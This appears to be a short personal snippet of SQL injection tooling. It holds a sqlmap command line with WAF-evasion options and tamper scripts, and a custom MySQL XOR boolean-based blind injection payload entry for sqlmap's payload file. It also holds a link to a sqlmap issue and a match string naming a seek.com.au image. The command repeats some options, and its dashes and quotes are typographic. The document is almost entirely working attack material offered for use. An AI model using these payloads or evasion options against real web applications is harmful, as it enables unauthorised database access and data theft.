subl ./libexec/data/xml/payloads/boolean_blind.xml sqlmap -u [URL] –data=”[POST]” –proxy=”http://127.0.0.1:8080” -p “searchline” –random-agent –dbms=mysql –skip-waf –level 1 –risk 1 –dbms=mysql –batch –technique=B –tamper=between,space2comment,test –schema –headers=”User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36” –header=”Content-Type: application/x-www-form-urlencoded” –suffix=”” –prefix=”sqli” –level 3 –string=”http://www.seek.com.au/employer/market-insights/web_images/ads_0001537772334.png” –flush-session
<test>
<title>MySQL XOR boolean-based blind</title>
<stype>1</stype>
<level>1</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>"XOR(if((select/**/666/**/where/**/[INFERENCE]),444,0))XOR"</vector>
<request>
<payload>"XOR(if((select/**/666/**/where/**/[RANDNUM]=[RANDNUM]),444,0))XOR"</payload>
</request>
<response>
<comparison>"XOR(if((select/**/666/**/where/**/[RANDNUM]=[RANDNUM1]),444,0))XOR"</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
https://github.com/sqlmapproject/sqlmap/issues/4091